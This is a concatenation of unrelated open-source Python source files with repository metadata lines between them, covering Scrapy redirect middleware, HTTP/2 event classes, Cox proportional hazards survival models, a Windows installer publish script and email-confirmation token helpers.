print(summary + '\033[m')
print()
if not test_passed:
break
if __name__ == "__main__":
main()
| io-digital/hurt | tolerance3/tolerance3.py | Python | bsd-2-clause | 5,505 |
import os, sys
import config
def notify_user(msg):
sys.stderr.write(msg+'\n')
raw_input('Press enter to exit ')
sys.exit(1)
def run_cmd(cmd):
if os.system(cmd) != 0:
notify_user('Command "%s" failed!'%cmd)
def run_cmds(*cmds):
for cmd in cmds:
run_cmd(cmd)
if config.current != config.production:
notify_user('Change current configuration to production before running')
logo_dir = r'..\sandbox\logos\icons'
run_cmds(
r'png2ico harmonize_icon.ico %s\orangecircle16.png %s\orangecircle32.png %s\orangecircle48.png' % (logo_dir, logo_dir, logo_dir),
'python setup.py py2exe',
r'"C:\Program Files\Inno Setup 5\iscc" windows_installer.iss',
'pscp "Output\Harmonizer Setup.exe" harmonize.fm:/var/opt/uploaders')
raw_input('Publish completed successfully')
| JustinTulloss/harmonize.fm | uploader/publish_win.py | Python | mit | 800 |
from datetime import date
from unittest import TestCase
from opensrs.models import Domain
class DomainTestCase(TestCase):
def setUp(self):
domain_data = {
'f_let_expire': 'N',
'expiredate': '2016-11-02 12:17:12',
'f_auto_renew': 'N',
'name': 'foo.co.za'
}
self.domain = Domain(domain_data)
def test_has_expiry_date_attribute(self):
self.assertEqual(self.domain.expiry_date, date(2016, 11, 2))
def test_has_tld_attribute(self):
self.assertEqual(self.domain.tld, 'za')
def test_has_name_attribute(self):
self.assertEqual(self.domain.name, 'foo.co.za')
def test_has_auto_renew_attribute(self):
self.assertFalse(self.domain.auto_renew)
def test_has_to_dict_method(self):
expected_data = {
'name': 'foo.co.za',
'auto_renew': False,
'expiry_date': date(2016, 11, 2),
}
self.assertEqual(self.domain.to_dict(), expected_data)
| yola/opensrs | tests/test_models.py | Python | mit | 1,014 |
from urlparse import urljoin
from scrapy import log
from scrapy.http import HtmlResponse
from scrapy.utils.response import get_meta_refresh
from scrapy.exceptions import IgnoreRequest, NotConfigured
class BaseRedirectMiddleware(object):
enabled_setting = 'REDIRECT_ENABLED'
def __init__(self, settings):
if not settings.getbool(self.enabled_setting):
raise NotConfigured
self.max_redirect_times = settings.getint('REDIRECT_MAX_TIMES')
self.priority_adjust = settings.getint('REDIRECT_PRIORITY_ADJUST')
@classmethod
def from_crawler(cls, crawler):
return cls(crawler.settings)
def _redirect(self, redirected, request, spider, reason):
ttl = request.meta.setdefault('redirect_ttl', self.max_redirect_times)
redirects = request.meta.get('redirect_times', 0) + 1
if ttl and redirects <= self.max_redirect_times:
redirected.meta['redirect_times'] = redirects
redirected.meta['redirect_ttl'] = ttl - 1
redirected.meta['redirect_urls'] = request.meta.get('redirect_urls', []) + \
[request.url]
redirected.dont_filter = request.dont_filter
redirected.priority = request.priority + self.priority_adjust
log.msg(format="Redirecting (%(reason)s) to %(redirected)s from %(request)s",
level=log.DEBUG, spider=spider, request=request,
redirected=redirected, reason=reason)
return redirected
else:
log.msg(format="Discarding %(request)s: max redirections reached",
level=log.DEBUG, spider=spider, request=request)
raise IgnoreRequest
def _redirect_request_using_get(self, request, redirect_url):
redirected = request.replace(url=redirect_url, method='GET', body='')
redirected.headers.pop('Content-Type', None)
redirected.headers.pop('Content-Length', None)
return redirected
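# A minimal sketch of the settings this middleware family reads (illustrative
# values, not necessarily the project defaults):
#
#   REDIRECT_ENABLED = True
#   REDIRECT_MAX_TIMES = 20        # upper bound on redirects per request
#   REDIRECT_PRIORITY_ADJUST = 2   # bump redirected requests in the scheduler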
class RedirectMiddleware(BaseRedirectMiddleware):
"""Handle redirection of requests based on response status and meta-refresh html tag"""
def process_response(self, request, response, spider):
if 'dont_redirect' in request.meta:
return response
if request.method == 'HEAD':
if response.status in [301, 302, 303, 307] and 'Location' in response.headers:
redirected_url = urljoin(request.url, response.headers['location'])
redirected = request.replace(url=redirected_url)
return self._redirect(redirected, request, spider, response.status)
else:
return response
if response.status in [302, 303] and 'Location' in response.headers:
redirected_url = urljoin(request.url, response.headers['location'])
redirected = self._redirect_request_using_get(request, redirected_url)
return self._redirect(redirected, request, spider, response.status)
if response.status in [301, 307] and 'Location' in response.headers:
redirected_url = urljoin(request.url, response.headers['location'])
redirected = request.replace(url=redirected_url)
return self._redirect(redirected, request, spider, response.status)
return response
class MetaRefreshMiddleware(BaseRedirectMiddleware):
enabled_setting = 'METAREFRESH_ENABLED'
def __init__(self, settings):
super(MetaRefreshMiddleware, self).__init__(settings)
self._maxdelay = settings.getint('REDIRECT_MAX_METAREFRESH_DELAY',
settings.getint('METAREFRESH_MAXDELAY'))
def process_response(self, request, response, spider):
if 'dont_redirect' in request.meta or request.method == 'HEAD' or \
not isinstance(response, HtmlResponse):
return response
        # the guard above already ensures this is an HtmlResponse
        interval, url = get_meta_refresh(response)
        if url and interval < self._maxdelay:
            redirected = self._redirect_request_using_get(request, url)
            return self._redirect(redirected, request, spider, 'meta refresh')
return response
| pablohoffman/scrapy | scrapy/contrib/downloadermiddleware/redirect.py | Python | bsd-3-clause | 4,231 |
# -*- coding: utf-8 -*-
"""
h2/events
~~~~~~~~~
Defines Event types for HTTP/2.
Events are returned by the H2 state machine to allow implementations to keep
track of events triggered by receiving data. Each time data is provided to the
H2 state machine it processes the data and returns a list of Event objects.
"""
from collections import namedtuple
class RequestReceived(object):
"""
The RequestReceived event is fired whenever request headers are received.
This event carries the HTTP headers for the given request and the stream ID
of the new stream.
"""
def __init__(self):
self.stream_id = None
self.headers = None
class ResponseReceived(object):
"""
    The ResponseReceived event is fired whenever response headers are received.
This event carries the HTTP headers for the given response and the stream
ID of the new stream.
"""
def __init__(self):
self.stream_id = None
self.headers = None
class DataReceived(object):
"""
The DataReceived event is fired whenever data is received on a stream from
the remote peer. The event carries the data itself, and the stream ID on
which the data was received.
"""
def __init__(self):
self.stream_id = None
self.data = None
class WindowUpdated(object):
"""
The WindowUpdated event is fired whenever a flow control window changes
size. HTTP/2 defines flow control windows for connections and streams: this
event fires for both connections and streams. The event carries the ID of
the stream to which it applies (set to zero if the window update applies to
the connection), and the delta in the window size.
"""
def __init__(self):
self.stream_id = None
self.delta = None
class RemoteSettingsChanged(object):
"""
The RemoteSettingsChanged event is fired whenever the remote peer changes
its settings. It contains a complete inventory of changed settings,
including their previous values.
In HTTP/2, settings changes need to be acknowledged. hyper-h2 does not
automatically acknowledge them, because it is possible that the caller may
not be happy with the changed setting (or would like to know about it).
When this event is received, the caller should confirm that the new
settings are acceptable, and then acknowledge them. If they are not
acceptable, the user should close the connection.
"""
#: A value structure for storing changed settings.
ChangedSetting = namedtuple(
'ChangedSetting', ['setting', 'original_value', 'new_value']
)
def __init__(self):
self.changed_settings = {}
@classmethod
def from_settings(cls, old_settings, new_settings):
"""
Build a RemoteSettingsChanged event from a set of changed settings.
:param old_settings: A complete collection of old settings, in the form
of a dictionary of ``{setting: value}``.
:param new_settings: All the changed settings and their new values, in
the form of a dictionary of ``{setting: value}``.
"""
e = cls()
for setting, new_value in new_settings.items():
original_value = old_settings.get(setting)
change = cls.ChangedSetting(setting, original_value, new_value)
e.changed_settings[setting] = change
return e
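    # A minimal usage sketch for from_settings(); settings are identified here
    # by their raw HTTP/2 codes (0x4 == SETTINGS_INITIAL_WINDOW_SIZE) and the
    # values are hypothetical:
    #
    #   event = RemoteSettingsChanged.from_settings(
    #       old_settings={0x4: 65535}, new_settings={0x4: 32768})
    #   event.changed_settings[0x4]  # -> ChangedSetting(0x4, 65535, 32768)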
class PingAcknowledged(object):
"""
The PingAcknowledged event is fired whenever a user-emitted PING is
acknowledged. This contains the data in the ACK'ed PING, allowing the
user to correlate PINGs and calculate RTT.
"""
def __init__(self):
self.ping_data = None
class StreamEnded(object):
"""
The StreamEnded event is fired whenever a stream is ended by a remote
party. The stream may not be fully closed if it has not been closed
locally, but no further data or headers should be expected on that stream.
"""
def __init__(self):
self.stream_id = None
class StreamReset(object):
"""
The StreamReset event is fired whenever a stream is forcefully reset by the
remote party. When this event is received, no further data can be sent on
the stream.
"""
def __init__(self):
self.stream_id = None
self.error_code = None
class PushedStreamReceived(object):
"""
The PushedStreamReceived event is fired whenever a pushed stream has been
received from a remote peer. The event carries on it the new stream ID, the
ID of the parent stream, and the request headers pushed by the remote peer.
"""
def __init__(self):
self.pushed_stream_id = None
self.parent_stream_id = None
self.headers = None
| mhils/hyper-h2 | h2/events.py | Python | mit | 4,782 |
<selection>#comment line
a = 1</selection> | allotria/intellij-community | python/testData/surround/SurroundCommentAtStart.py | Python | apache-2.0 | 42 |
#!/bin/python
# -*- coding: utf-8 -*-
# Fenrir TTY screen reader
# By Chrys, Storm Dragon, and contributers.
from fenrirscreenreader.core import debug
class command():
def __init__(self):
pass
def initialize(self, environment):
self.env = environment
def shutdown(self):
pass
def getDescription(self):
return _('get current help message')
def run(self):
text = self.env['runtime']['helpManager'].getHelpForCurrentIndex()
self.env['runtime']['outputManager'].presentText(text, interrupt=True)
def setCallback(self, callback):
pass
| chrys87/fenrir | src/fenrirscreenreader/commands/help/curr_help.py | Python | lgpl-3.0 | 656 |
from __future__ import absolute_import
import torch
import numpy as np
import pandas as pd
import scipy
import copy
from pysurvival import HAS_GPU
from pysurvival import utils
from pysurvival.utils import neural_networks as nn
from pysurvival.utils import optimization as opt
from pysurvival.models import BaseModel
from pysurvival.models._coxph import _CoxPHModel
from pysurvival.models._coxph import _baseline_functions
class CoxPHModel(BaseModel):
""" Cox proportional hazards model:
-------------------------------
The purpose of the model is to evaluate simultaneously
the effect of several factors on survival.
In other words, it allows us to examine how specified factors
influence the rate of a particular event happening
at a particular point in time.
The Cox model is expressed by the hazard function h(t)
    (the risk of dying at time t).
    It can be estimated as follows:
    h(t, x) = h_0(t) * exp(<x, W>)
    Then the survival function can be calculated as follows:
H(t, x) = cumsum( h(t, x) )
S(t, x) = exp( -H(t, x) )
Reference:
* http://www.sthda.com/english/wiki/cox-proportional-hazards-model
"""
def get_summary(self, alpha = 0.95, precision=3):
""" Providing the summary of the regression results:
* standard errors
* z-score
* p-value
"""
# Flattening the coef
W_flat = self.weights.flatten()
# calculating standard error
self.std_err = np.sqrt(self.inv_Hessian.diagonal())/self.std_scale
# Confidence Intervals
alpha = scipy.stats.norm.ppf((1. + alpha) / 2.)
lower_ci = np.round( W_flat - alpha * self.std_err, precision)
upper_ci = np.round( W_flat + alpha * self.std_err, precision)
z = np.round(W_flat / self.std_err , precision)
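        # two-sided Wald test: chi2.sf(z**2, 1) is equivalent to 2*(1 - Phi(|z|))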
p_values = np.round(scipy.stats.chi2.sf( np.square(z), 1), precision)
W = np.round(W_flat, precision)
std_err = np.round(self.std_err, precision)
# Creating summary
df = np.c_[self.variables, W, std_err,
lower_ci, upper_ci, z, p_values]
df = pd.DataFrame(data = df,
columns = ['variables', 'coef', 'std. err',
'lower_ci', 'upper_ci',
'z', 'p_values'])
self.summary = df
return df
def fit(self, X, T, E, init_method='glorot_normal', lr = 1e-2,
max_iter = 100, l2_reg = 1e-2, alpha = 0.95,
tol = 1e-3, verbose = True ):
"""
Fitting a proportional hazards regression model using
        Efron's approximation method to take into account tied times.
As the Hessian matrix of the log-likelihood can be
calculated without too much effort, the model parameters are
computed using the Newton_Raphson Optimization scheme:
W_new = W_old - lr*<Hessian^(-1), gradient>
Arguments:
---------
* `X` : **array-like**, *shape=(n_samples, n_features)* --
The input samples.
* `T` : **array-like** --
The target values describing when the event of interest or
censoring occurred.
* `E` : **array-like** --
The values that indicate if the event of interest occurred
i.e.: E[i]=1 corresponds to an event, and E[i] = 0 means censoring,
for all i.
        * `init_method` : **str** *(default = 'glorot_normal')* --
Initialization method to use. Here are the possible options:
* `glorot_uniform`: Glorot/Xavier uniform initializer
* `he_uniform`: He uniform variance scaling initializer
* `uniform`: Initializing tensors with uniform (-1, 1) distribution
* `glorot_normal`: Glorot normal initializer,
* `he_normal`: He normal initializer.
* `normal`: Initializing tensors with standard normal distribution
* `ones`: Initializing tensors to 1
* `zeros`: Initializing tensors to 0
* `orthogonal`: Initializing tensors with a orthogonal matrix,
        * `lr`: **float** *(default=1e-2)* --
learning rate used in the optimization
* `max_iter`: **int** *(default=100)* --
The maximum number of iterations in the Newton optimization
        * `l2_reg`: **float** *(default=1e-2)* --
L2 regularization parameter for the model coefficients
* `alpha`: **float** *(default=0.95)* --
Confidence interval
* `tol`: **float** *(default=1e-3)* --
Tolerance for stopping criteria
* `verbose`: **bool** *(default=True)* --
            Whether or not to produce detailed logging about the modeling
Example:
--------
#### 1 - Importing packages
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from pysurvival.models.simulations import SimulationModel
from pysurvival.models.semi_parametric import CoxPHModel
from pysurvival.utils.metrics import concordance_index
from pysurvival.utils.display import integrated_brier_score
#%pylab inline # To use with Jupyter notebooks
#### 2 - Generating the dataset from a Log-Logistic parametric model
# Initializing the simulation model
sim = SimulationModel( survival_distribution = 'log-logistic',
risk_type = 'linear',
censored_parameter = 10.1,
alpha = 0.1, beta=1.2 )
# Generating N random samples
N = 1000
dataset = sim.generate_data(num_samples = N, num_features = 3)
#### 3 - Creating the modeling dataset
# Defining the features
features = sim.features
# Building training and testing sets #
index_train, index_test = train_test_split( range(N), test_size = 0.2)
data_train = dataset.loc[index_train].reset_index( drop = True )
data_test = dataset.loc[index_test].reset_index( drop = True )
# Creating the X, T and E input
X_train, X_test = data_train[features], data_test[features]
T_train, T_test = data_train['time'].values, data_test['time'].values
E_train, E_test = data_train['event'].values, data_test['event'].values
#### 4 - Creating an instance of the Cox PH model and fitting the data.
# Building the model
coxph = CoxPHModel()
coxph.fit(X_train, T_train, E_train, lr=0.5, l2_reg=1e-2,
init_method='zeros')
#### 5 - Cross Validation / Model Performances
c_index = concordance_index(coxph, X_test, T_test, E_test) #0.92
print('C-index: {:.2f}'.format(c_index))
ibs = integrated_brier_score(coxph, X_test, T_test, E_test, t_max=10,
figure_size=(20, 6.5) )
References:
-----------
* https://en.wikipedia.org/wiki/Proportional_hazards_model#Tied_times
        * Efron, Bradley (1977). "The Efficiency of Cox's Likelihood
Function for Censored Data". Journal of the American Statistical
Association. 72 (359): 557-565.
"""
# Collecting features names
N, self.num_vars = X.shape
if isinstance(X, pd.DataFrame):
self.variables = X.columns.tolist()
else:
self.variables = ['x_{}'.format(i) for i in range(self.num_vars)]
# Checking the format of the data
X, T, E = utils.check_data(X, T, E)
order = np.argsort(-T)
T = T[order]
E = E[order]
X = self.scaler.fit_transform( X[order, :] )
self.std_scale = np.sqrt( self.scaler.var_ )
# Initializing the model
self.model = _CoxPHModel()
# Creating the time axis
self.model.get_times(T, E)
# Initializing the parameters
W = np.zeros(self.num_vars)
W = opt.initialization(init_method, W, False).flatten()
W = W.astype(np.float64)
# Optimizing to find best parameters
epsilon=1e-9
self.model.newton_optimization(X, T, E, W, lr, l2_reg, tol, epsilon,
max_iter, verbose)
# Saving the Cython attributes in the Python object
self.weights = np.array( self.model.W )
self.loss = self.model.loss
self.times = np.array( self.model.times)
self.gradient = np.array( self.model.gradient )
self.Hessian = np.array( self.model.Hessian )
self.inv_Hessian = np.array( self.model.inv_Hessian )
self.loss_values = np.array( self.model.loss_values )
self.grad2_values = np.array( self.model.grad2_values )
# Computing baseline functions
score = np.exp( np.dot(X, self.weights) )
baselines = _baseline_functions(score, T, E)
# Saving the Cython attributes in the Python object
self.baseline_hazard = np.array( baselines[1] )
self.baseline_survival = np.array( baselines[2] )
del self.model
self.get_time_buckets()
# Calculating summary
self.get_summary(alpha)
return self
def predict(self, x, t = None):
"""
Predicting the hazard, density and survival functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
* t: float (default=None)
Time at which hazard, density and survival functions
should be calculated. If None, the method returns
the functions for all times t.
"""
# Convert x into the right format
x = utils.check_data(x)
        # Scaling the dataset
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
# Calculating risk_score, hazard, density and survival
phi = np.exp( np.dot(x, self.weights) )
hazard = self.baseline_hazard*phi.reshape(-1, 1)
survival = np.power(self.baseline_survival, phi.reshape(-1, 1))
density = hazard*survival
if t is None:
return hazard, density, survival
else:
min_index = [ abs(a_j_1-t) for (a_j_1, a_j) in self.time_buckets ]
index = np.argmin(min_index)
return hazard[:, index], density[:, index], survival[:, index]
def predict_risk(self, x, use_log = False):
"""
Predicting the risk score functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
"""
# Convert x into the right format
x = utils.check_data(x)
# Scaling the dataset
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
        # Calculating risk_score: the linear predictor <x, W>, exponentiated
        # unless the caller asked for the log risk
        risk_score = np.dot(x, self.weights)
        if not use_log:
            risk_score = np.exp(risk_score)
return risk_score
class NonLinearCoxPHModel(BaseModel):
""" NonLinear Cox Proportional Hazard model (NeuralCoxPH)
The original Cox Proportional Hazard model, was first introduced
by David R Cox in `Regression models and life-tables`.
The NonLinear CoxPH model was popularized by Katzman et al.
in `DeepSurv: Personalized Treatment Recommender System Using
A Cox Proportional Hazards Deep Neural Network` by allowing the use of
Neural Networks within the original design.
This current adaptation of the model differs from DeepSurv
    as it uses Efron's method to take ties into account.
Parameters
----------
* structure: None or list of dictionaries
Provides an MLP structure within the CoxPH
If None, then the model becomes the Linear CoxPH
ex: structure = [ {'activation': 'relu', 'num_units': 128},
{'activation': 'tanh', 'num_units': 128}, ]
Here are the possible activation functions:
* Atan
* BentIdentity
* BipolarSigmoid
* CosReLU
* ELU
* Gaussian
* Hardtanh
* Identity
* InverseSqrt
* LeakyReLU
* LeCunTanh
* LogLog
* LogSigmoid
* ReLU
* SELU
* Sigmoid
* Sinc
* SinReLU
* Softmax
* Softplus
* Softsign
* Swish
* Tanh
* auto_scaler: boolean (default=True)
Determines whether a sklearn scaler should be automatically
applied
"""
def __init__(self, structure=None, auto_scaler = True):
# Saving attributes
self.structure = structure
self.loss_values = []
# Initializing the elements from BaseModel
super(NonLinearCoxPHModel, self).__init__(auto_scaler)
def risk_fail_matrix(self, T, E):
""" Calculating the Risk, Fail matrices to calculate the loss
function by vectorizing all the quantities at stake
"""
N = T.shape[0]
Risk = np.zeros( (self.nb_times, N) )
Fail = np.zeros( (self.nb_times, N) )
for i in range(N):
# At risk
index_risk = np.argwhere( self.times <= T[i] ).flatten()
Risk[ index_risk, i] = 1.
# Failed
if E[i] == 1 :
index_fail = np.argwhere( self.times == T[i] )[0]
Fail[index_fail, i] = 1.
self.nb_fail_per_time = np.sum( Fail, axis = 1 ).astype(int)
return torch.FloatTensor(Risk), torch.FloatTensor(Fail)
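    # Tiny worked sketch for risk_fail_matrix (hypothetical data): with
    # T = [5, 3, 3], E = [1, 0, 1] and event times self.times = [3, 5]:
    #   Risk = [[1, 1, 1],   # everyone still at risk at t=3
    #           [1, 0, 0]]   # only the first donor at risk at t=5
    #   Fail = [[0, 0, 1],   # the third donor fails at t=3
    #           [1, 0, 0]]   # the first donor fails at t=5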
def efron_matrix(self):
""" Computing the Efron Coefficient matrices to calculate the loss
function by vectorizing all the quantities at stake
"""
max_nb_fails = int(max(self.nb_fail_per_time))
Efron_coef = np.zeros( (self.nb_times, max_nb_fails ) )
Efron_one = np.zeros( (self.nb_times, max_nb_fails ) )
Efron_anti_one = np.ones( (self.nb_times, max_nb_fails ) )
for i, d in enumerate(self.nb_fail_per_time) :
if d > 0:
Efron_coef[i, :d] = [ h*1.0/d for h in range( d )]
Efron_one [i, :d] = 1.
Efron_anti_one[i, :d] = 0.
Efron_coef = torch.FloatTensor(Efron_coef)
Efron_one = torch.FloatTensor(Efron_one)
Efron_anti_one = torch.FloatTensor(Efron_anti_one)
return Efron_coef, Efron_one, Efron_anti_one
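    # Sketch for efron_matrix (hypothetical data): with
    # nb_fail_per_time = [2, 0, 1] (so max_nb_fails = 2):
    #   Efron_coef     = [[0.0, 0.5], [0.0, 0.0], [0.0, 0.0]]
    #   Efron_one      = [[1.0, 1.0], [0.0, 0.0], [1.0, 0.0]]
    #   Efron_anti_one = [[0.0, 0.0], [1.0, 1.0], [0.0, 1.0]]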
def loss_function(self, model, X, Risk, Fail,
Efron_coef, Efron_one, Efron_anti_one, l2_reg):
""" Efron's approximation loss function by vectorizing
all the quantities at stake
"""
# Calculating the score
pre_score = model(X)
score = torch.reshape( torch.exp(pre_score), (-1, 1) )
max_nb_fails = Efron_coef.shape[1]
# Numerator calculation
log_score = torch.log( score )
log_fail = torch.mm(Fail, log_score)
numerator = torch.sum(log_fail)
# Denominator calculation
risk_score = torch.reshape( torch.mm(Risk, score), (-1,1) )
risk_score = risk_score.repeat(1, max_nb_fails)
fail_score = torch.reshape( torch.mm(Fail, score), (-1,1) )
fail_score = fail_score.repeat(1, max_nb_fails)
Efron_Fail = fail_score*Efron_coef
Efron_Risk = risk_score*Efron_one
log_efron = torch.log( Efron_Risk - Efron_Fail + Efron_anti_one)
denominator = torch.sum( torch.sum(log_efron, dim=1) )
# Adding regularization
loss = - (numerator - denominator)
for w in model.parameters():
loss += l2_reg*torch.sum(w*w)/2.
return loss
def fit(self, X, T, E, init_method = 'glorot_uniform',
optimizer ='adam', lr = 1e-4, num_epochs = 1000,
dropout = 0.2, batch_normalization=False, bn_and_dropout=False,
l2_reg=1e-5, verbose=True):
"""
Fit the estimator based on the given parameters.
Parameters:
-----------
* `X` : **array-like**, *shape=(n_samples, n_features)* --
The input samples.
* `T` : **array-like** --
The target values describing when the event of interest or censoring
occurred.
* `E` : **array-like** --
The values that indicate if the event of interest occurred i.e.:
E[i]=1 corresponds to an event, and E[i] = 0 means censoring,
for all i.
* `init_method` : **str** *(default = 'glorot_uniform')* --
Initialization method to use. Here are the possible options:
* `glorot_uniform`: Glorot/Xavier uniform initializer
* `he_uniform`: He uniform variance scaling initializer
* `uniform`: Initializing tensors with uniform (-1, 1) distribution
* `glorot_normal`: Glorot normal initializer,
* `he_normal`: He normal initializer.
* `normal`: Initializing tensors with standard normal distribution
* `ones`: Initializing tensors to 1
* `zeros`: Initializing tensors to 0
* `orthogonal`: Initializing tensors with a orthogonal matrix,
* `optimizer`: **str** *(default = 'adam')* --
iterative method for optimizing a differentiable objective function.
Here are the possible options:
- `adadelta`
- `adagrad`
- `adam`
- `adamax`
- `rmsprop`
- `sparseadam`
- `sgd`
* `lr`: **float** *(default=1e-4)* --
learning rate used in the optimization
* `num_epochs`: **int** *(default=1000)* --
The number of iterations in the optimization
        * `dropout`: **float** *(default=0.2)* --
Randomly sets a fraction rate of input units to 0
at each update during training time, which helps prevent overfitting.
        * `l2_reg`: **float** *(default=1e-5)* --
L2 regularization parameter for the model coefficients
        * `batch_normalization`: **bool** *(default=False)* --
Applying Batch Normalization or not
* `bn_and_dropout`: **bool** *(default=False)* --
Applying Batch Normalization and Dropout at the same time
* `verbose`: **bool** *(default=True)* --
            Whether or not to produce detailed logging about the modeling
Example:
--------
#### 1 - Importing packages
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from pysurvival.models.simulations import SimulationModel
from pysurvival.models.semi_parametric import NonLinearCoxPHModel
from pysurvival.utils.metrics import concordance_index
from pysurvival.utils.display import integrated_brier_score
#%matplotlib inline # To use with Jupyter notebooks
#### 2 - Generating the dataset from a nonlinear Weibull parametric model
# Initializing the simulation model
sim = SimulationModel( survival_distribution = 'weibull',
risk_type = 'Gaussian',
censored_parameter = 2.1,
alpha = 0.1, beta=3.2 )
# Generating N random samples
N = 1000
dataset = sim.generate_data(num_samples = N, num_features=3)
# Showing a few data-points
dataset.head(2)
#### 3 - Creating the modeling dataset
# Defining the features
features = sim.features
# Building training and testing sets #
index_train, index_test = train_test_split( range(N), test_size = 0.2)
data_train = dataset.loc[index_train].reset_index( drop = True )
data_test = dataset.loc[index_test].reset_index( drop = True )
# Creating the X, T and E input
X_train, X_test = data_train[features], data_test[features]
T_train, T_test = data_train['time'].values, data_test['time'].values
E_train, E_test = data_train['event'].values, data_test['event'].values
#### 4 - Creating an instance of the NonLinear CoxPH model and fitting
# the data.
# Defining the MLP structure. Here we will build a 1-hidden layer
# with 150 units and `BentIdentity` as its activation function
structure = [ {'activation': 'BentIdentity', 'num_units': 150}, ]
# Building the model
nonlinear_coxph = NonLinearCoxPHModel(structure=structure)
nonlinear_coxph.fit(X_train, T_train, E_train, lr=1e-3,
                init_method='glorot_uniform')
#### 5 - Cross Validation / Model Performances
c_index = concordance_index(nonlinear_coxph, X_test, T_test, E_test)
print('C-index: {:.2f}'.format(c_index))
ibs = integrated_brier_score(nonlinear_coxph, X_test, T_test, E_test,
t_max=10, figure_size=(20, 6.5) )
"""
# Checking data format (i.e.: transforming into numpy array)
X, T, E = utils.check_data(X, T, E)
# Extracting data parameters
N, self.num_vars = X.shape
input_shape = self.num_vars
        # Scaling data (fall back to the raw input when auto_scaler is off,
        # otherwise X_original would be undefined below)
        if self.auto_scaler:
            X_original = self.scaler.fit_transform( X )
        else:
            X_original = X
# Sorting X, T, E in descending order according to T
order = np.argsort(-T)
T = T[order]
E = E[order]
X_original = X_original[order, :]
self.times = np.unique(T[E.astype(bool)])
self.nb_times = len(self.times)
self.get_time_buckets()
# Initializing the model
model = nn.NeuralNet(input_shape, 1, self.structure,
init_method, dropout, batch_normalization,
bn_and_dropout )
# Looping through the data to calculate the loss
X = torch.FloatTensor(X_original)
        # Computing the Risk and Fail tensors (already returned as FloatTensors)
        Risk, Fail = self.risk_fail_matrix(T, E)
        # Computing Efron's matrices (already returned as FloatTensors)
        Efron_coef, Efron_one, Efron_anti_one = self.efron_matrix()
# Performing order 1 optimization
model, loss_values = opt.optimize(self.loss_function, model, optimizer,
lr, num_epochs, verbose, X=X, Risk=Risk, Fail=Fail,
Efron_coef=Efron_coef, Efron_one=Efron_one,
Efron_anti_one=Efron_anti_one, l2_reg=l2_reg)
# Saving attributes
self.model = model.eval()
self.loss_values = loss_values
# Computing baseline functions
x = X_original
x = torch.FloatTensor(x)
        # Calculating risk_score (x was converted to a FloatTensor above)
        score = np.exp(self.model(x).data.numpy().flatten())
baselines = _baseline_functions(score, T, E)
# Saving the Cython attributes in the Python object
self.times = np.array( baselines[0] )
self.baseline_hazard = np.array( baselines[1] )
self.baseline_survival = np.array( baselines[2] )
return self
def predict(self, x, t = None):
"""
Predicting the hazard, density and survival functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
* t: float (default=None)
Time at which hazard, density and survival functions
should be calculated. If None, the method returns
the functions for all times t.
"""
# Convert x into the right format
x = utils.check_data(x)
# Scaling the dataset
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
# Calculating risk_score, hazard, density and survival
score = self.model(torch.FloatTensor(x)).data.numpy().flatten()
phi = np.exp( score )
hazard = self.baseline_hazard*phi.reshape(-1, 1)
survival = np.power(self.baseline_survival, phi.reshape(-1, 1))
density = hazard*survival
if t is None:
return hazard, density, survival
else:
min_index = [ abs(a_j_1-t) for (a_j_1, a_j) in self.time_buckets ]
index = np.argmin(min_index)
return hazard[:, index], density[:, index], survival[:, index]
def predict_risk(self, x, use_log = False):
"""
Predicting the risk score functions
Arguments:
* x: pd.Dataframe or np.ndarray or list
x is the testing dataset containing the features
x should not be standardized before, the model
will take care of it
"""
# Convert x into the right format
x = utils.check_data(x)
# Scaling the data
if self.auto_scaler:
if x.ndim == 1:
x = self.scaler.transform( x.reshape(1, -1) )
elif x.ndim == 2:
x = self.scaler.transform( x )
else:
# Ensuring x has 2 dimensions
if x.ndim == 1:
x = np.reshape(x, (1, -1))
# Transforming into pytorch objects
x = torch.FloatTensor(x)
# Calculating risk_score
score = self.model(x).data.numpy().flatten()
if not use_log:
score = np.exp(score)
return score
def __repr__(self):
""" Representing the class object """
if self.structure is None:
super(NonLinearCoxPHModel, self).__repr__()
return self.name
else:
S = len(self.structure)
self.name = self.__class__.__name__
empty = len(self.name)
self.name += '( '
for i, s in enumerate(self.structure):
n = 'Layer({}): '.format(i+1)
activation = nn.activation_function(s['activation'],
return_text=True)
n += 'activation = {}, '.format( s['activation'] )
n += 'num_units = {} '.format( s['num_units'] )
if i != S-1:
self.name += n + '; \n'
self.name += empty*' ' + ' '
else:
self.name += n
self.name += ')'
return self.name
| square/pysurvival | pysurvival/models/semi_parametric.py | Python | apache-2.0 | 28,318 |
import os
from app import create_app
from itsdangerous import URLSafeTimedSerializer, BadSignature, SignatureExpired
app = create_app(os.environ['APP_CONFIG'])
def generate_confirmation_token(email):
serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
return serializer.dumps(email, salt = app.config['PASSWORD_SALT'])
def confirm_token(token, expiration=604800):
serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
try:
email = serializer.loads(token, salt = app.config['PASSWORD_SALT'], max_age = expiration)
    except (BadSignature, SignatureExpired):
        return False
return email
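# Illustrative round trip (the email value is hypothetical):
#   token = generate_confirmation_token('user@example.com')
#   confirm_token(token)                # -> 'user@example.com' while fresh
#   confirm_token(token, expiration=1)  # -> False once the token is >1s old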
def confirm_request(token, expiration=259200):
serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
try:
email = serializer.loads(token, salt = app.config['PASSWORD_SALT'], max_age = expiration)
    except (BadSignature, SignatureExpired):
        return False
return email
| andMYhacks/infosec_mentors_project | app/token.py | Python | gpl-3.0 | 848 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ee
import json
import sys
import time
class ExportGeeAssetsStatus(object):
options = {
'assets': {
